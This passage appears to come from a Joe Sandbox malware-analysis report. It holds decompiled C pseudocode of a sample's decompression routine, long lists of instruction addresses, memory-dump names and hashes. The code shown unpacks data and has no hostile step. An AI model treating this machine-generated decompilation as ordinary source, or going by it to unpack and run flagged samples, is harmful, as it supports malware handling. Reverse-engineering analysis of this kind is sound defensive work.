							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                    0x00406bc0
                                                                                    0x00406bc7
                                                                                    0x00406bcd
                                                                                    0x00406bd3
                                                                                    0x00000000
                                                                                    0x00406bd7
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bf9
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c0e
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c59
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c5e
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c76
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406ccd
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd2
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cef
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d35
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073dd
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x00407413
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x00000000
                                                                                    0x004075cf
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743b
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d61
                                                                                    0x00406d64
                                                                                    0x00406dd5
                                                                                    0x00406dd8
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x00000000
                                                                                    0x00406dec
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d6d
                                                                                    0x00406d6f
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d87
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406d9c
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406dac
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00000000
                                                                                    0x00406dcf
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406db7
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407020
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x0040702d
                                                                                    0x00407030
                                                                                    0x00407033
                                                                                    0x00407036
                                                                                    0x00407039
                                                                                    0x0040703b
                                                                                    0x00407042
                                                                                    0x00407043
                                                                                    0x00407045
                                                                                    0x00407048
                                                                                    0x0040704b
                                                                                    0x0040704e
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407053
                                                                                    0x00407004
                                                                                    0x00407007
                                                                                    0x0040700a
                                                                                    0x00407014
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x0040708f
                                                                                    0x00407092
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x0040706e
                                                                                    0x00407071
                                                                                    0x00407074
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x00407087
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070bf
                                                                                    0x004070c1
                                                                                    0x004070c5
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x00407127
                                                                                    0x0040712a
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x00000000
                                                                                    0x00407137
                                                                                    0x00407122
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x0040715d
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00407166
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407170
                                                                                    0x00407175
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x00000000
                                                                                    0x00407569
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e29
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407056
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073bb
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00000000
                                                                                    0x00407489
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407194
                                                                                    0x00407197
                                                                                    0x0040719a
                                                                                    0x0040719c
                                                                                    0x0040719e
                                                                                    0x0040719e
                                                                                    0x0040719f
                                                                                    0x004071a2
                                                                                    0x004071a9
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040749f
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x00407447
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074eb
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x0040751d
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00000000
                                                                                    0x0040710d
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x004075e5
                                                                                    0x004075eb
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                    • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                    • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                    • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
